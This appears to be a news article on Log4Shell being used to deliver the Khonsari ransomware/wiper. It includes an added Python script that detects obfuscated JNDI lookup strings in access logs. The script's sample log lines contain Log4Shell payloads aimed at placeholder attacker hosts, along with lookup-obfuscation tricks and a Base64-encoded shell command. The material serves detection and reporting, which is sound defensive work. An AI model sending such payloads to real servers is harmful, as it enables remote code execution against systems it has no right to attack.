Researchers have identified the first publicly reported case of the Log4j ‘Log4Shell’ vulnerability being used to download and install ransomware. Last Friday, a public exploit was released for ‘Log4Shell’, a critical zero-day vulnerability in the Apache Log4j Java logging library. Log4j is a logging library that lets Java developers record errors and events from their applications.
The flaw lets attackers craft strings containing JNDI lookups (of the form ${jndi:ldap://attacker-host/path}). When a vulnerable Log4j instance logs such a string, it performs the lookup, connects to the attacker-supplied URL and can load and execute the Java class returned from it. This makes it easy to scan for vulnerable hosts, to run code fetched from a remote server, or to pass commands as Base64-encoded strings inside the lookup.
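A practical way to see what these JNDI strings look like in practice is to hunt for them in access logs. The detector below is an added example, not code from the article or from any vendor it cites: it collapses the nested-lookup obfuscations attackers use to dodge naive string matching (${lower:...}, ${upper:...} and the ${env:NAME:-x} / ${::-x} default-value trick), then extracts the scheme, host, port and path of each JNDI lookup and decodes any /Base64/ command component. The log lines, IP addresses and hostnames are constructed for the demo and are placeholders.

```python
"""Detect Log4Shell-style JNDI lookup strings in log lines.

Added example (not code from the article or from the vendors it cites).
The log lines below are constructed for the demo and the hosts in them
are placeholders; the detector itself needs only the Python stdlib.
"""
import base64
import re
from typing import Dict, List, Optional

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# A (de-obfuscated) JNDI lookup: ${jndi:<scheme>://<host>[:port][/path]}
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*"
    r"(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?(?P<path>/[^}]*)?\}",
    re.IGNORECASE,
)

# Convention used by public exploit servers: /Basic/Command/Base64/<cmd>
_B64 = re.compile(r"/Base64/(?P<b64>[A-Za-z0-9+/=]+)")


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j's StrSubstitutor would."""
    body = m.group(1)
    head = body.lower().lstrip()
    if head.startswith("jndi"):
        return m.group(0)            # the lookup we want to detect: keep it
    if head.startswith("lower:"):
        return body[body.index(":") + 1:].lower()
    if head.startswith("upper:"):
        return body[body.index(":") + 1:].upper()
    if ":-" in body:
        # ${env:NOPE:-j}, ${sys:x:-j}, ${::-j}: the lookup fails on purpose
        # so Log4j substitutes the default value written after ':-'.
        return body.split(":-", 1)[1]
    return m.group(0)                # unknown lookup: leave it alone


def normalize(s: str, max_rounds: int = 16) -> str:
    """Collapse nested/obfuscated lookups until a fixed point (or the cap)."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def scan_line(line: str) -> List[Dict[str, object]]:
    """Return one finding per JNDI lookup present in the line."""
    norm = normalize(line)
    findings: List[Dict[str, object]] = []
    for m in _JNDI.finditer(norm):
        path = m.group("path") or ""
        command: Optional[str] = None
        b = _B64.search(path)
        if b:
            try:
                command = base64.b64decode(b.group("b64"), validate=True).decode("utf-8", "replace")
            except ValueError:       # binascii.Error is a ValueError
                command = None
        findings.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": path,
            "command": command,
            "obfuscated": norm != line,
            "normalized": m.group(0),
        })
    return findings


def scan(lines):
    """Scan many lines; each finding is tagged with its 1-based line number."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for f in scan_line(line):
            f["line_no"] = n
            hits.append(f)
    return hits


# Constructed sample access-log lines (placeholder addresses, not real traffic).
_CMD_B64 = base64.b64encode(b"touch /tmp/pwned").decode()
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.11 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '203.0.113.12 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:rmi://attacker.example/y}"',
    '203.0.113.13 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.14 - - [10/Dec/2021:10:00:05 +0000] "GET /?q=${jndi:ldap://attacker.example/Basic/Command/Base64/' + _CMD_B64 + '} HTTP/1.1" 404 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

Matching only the literal text "${jndi:" misses the second and third sample lines entirely, which is why the normalisation pass runs first; the "obfuscated" flag is worth alerting on by itself, since legitimate traffic has no reason to carry nested Log4j lookups.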
Although the vulnerability was patched in Log4j 2.15.0 and hardened further in Log4j 2.16.0, threat actors continue to exploit it to deploy malware, including cryptocurrency miners, botnets and Cobalt Strike beacons. Bitdefender has now reported the first ransomware family to be installed directly through Log4Shell.
The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class, which the vulnerable Log4j application loads and executes. That class then downloads a .NET binary from the same host, which installs a new ransomware family identified on VirusTotal as ‘Khonsari’. The same name appears in the ransom note and as the extension appended to encrypted files. In later attacks, Bitdefender found the same threat actor using the same site to distribute the Orcus Remote Access Trojan.
Ransomware expert Michael Gillespie confirmed that Khonsari uses valid encryption and is secure, meaning files cannot be recovered for free. The ransom note has one oddity, however: it does not appear to give any way of contacting the threat actor to pay a ransom.
According to Emsisoft researcher Brett Callow, the ransomware is named after, and uses the contact information of, a Louisiana antique shop owner rather than the threat actor. It is therefore unclear whether that person is a genuine victim of the operation or merely a decoy.
Whatever the reason, because it carries no genuine contact information for the attackers, experts regard this as a wiper rather than true ransomware. While this is the first known case of Log4Shell being used directly to deliver ransomware (or a wiper), Microsoft has already observed the vulnerability being used to deploy Cobalt Strike beacons, so it is likely that more sophisticated ransomware operations are already exploiting the flaw.